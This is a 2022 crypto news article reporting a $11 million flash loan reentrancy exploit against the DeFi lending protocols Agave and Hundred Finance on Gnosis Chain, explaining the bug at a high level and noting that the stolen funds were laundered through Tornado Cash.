DeFi protocols Agave and Hundred Finance exploited on Gnosis Chain for $11 million

Quick Take

  • The attacker introduced a reentrancy bug to steal funds using a flash loan exploit.
  • The projects lost a combined $11 million in the attack, hours after a similar incident involving Deus Finance.

An attacker has siphoned over $11 million from Agave and Hundred Finance in what appears to be a flash loan reentrancy attack on both DeFi protocols on the Gnosis chain.

The DeFi platforms each confirmed the hacks in Twitter posts on Tuesday, stating that their contracts have been paused to forestall further damage. The attack marks the second flash loan exploit recorded today as Deus Finance DAO also lost $3 million.

Examining the transaction breakdown data for both exploits on Tenderly, the attacker exploited a reentrancy vulnerability in both protocols. Reentrancy is a Solidity programming language vulnerability that allows an attacker to trick a protocol’s contract into making an external call to an untrusted contract. Once this happens, the hacker can then use this untrusted contract to make repeated calls to the protocol to drain its funds.

In the case of Agave and Hundred Finance, the attacker introduced a reentrancy bug on both protocols paving the way for a flash loan exploit. The reentrancy vulnerability appears centered on the “callAfterTransfer” function, allowing the hackers to continue borrowing from the protocols — siphoning off massive swathes of liquidity.

In essence, the attacker was making recursive calls to siphon off user funds without having to put up additional collateral. Then the attacker terminated the exploit with a “liquidationCall,” paying back their initial flash loan while still holding significant liquidity from both projects.

The attacker has begun to launder the funds via Tornado Cash, but Etherscan hasn't labeled their address as associated with a DeFi exploit as of the time of writing.

Flash loan attacks continue

Agave is a lending protocol on the Gnosis chain and is a fork of the popular Aave protocol. Hundred Finance is a multi-chain lending project and is a fork of Compound.

Cream Finance, a DeFi lending protocol that shares a similar codebase to Compound, also suffered a flash loan reentrancy attack last summer. The exploit led to the loss of $19 million in crypto tokens from the project.

© 2022 The Block Crypto, Inc. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.

Trending Stories

Get Your Crypto
Daily Brief

Delivered daily, straight to your inbox.

The TRON Ecosystem Thrives Amidst Market Chaos

TRON DAO has announced the launch of a $10 million incentive fund in light of recent events to support Terra developers migrating to the TRON ecosystem, including TRON’s EVM compatible cross-chain solution BitTorrent Chain (BTTC), which helps facilitate the seamless transfer of assets across mainstream public chains, including TRON, Ethereum, and BNB Chain. 
Read Full Story
Sponsored Post

Layer-2 Scaling Solutions: A Framework for Comparison - Commissioned by Polygon

Ethereum had a breakout year in 2021. It’s native asset, ETH’s, market capitalization surpassed $500 billion for the first time. Its network facilitated upwards of $7 trillion value transfer. Non-fungible tokens (NFTs) emerged as another “killer application” that have put its technology on the global stage and caught the attention of the masses.
Read Full Story
May 5, 2022, 3:17PM UTC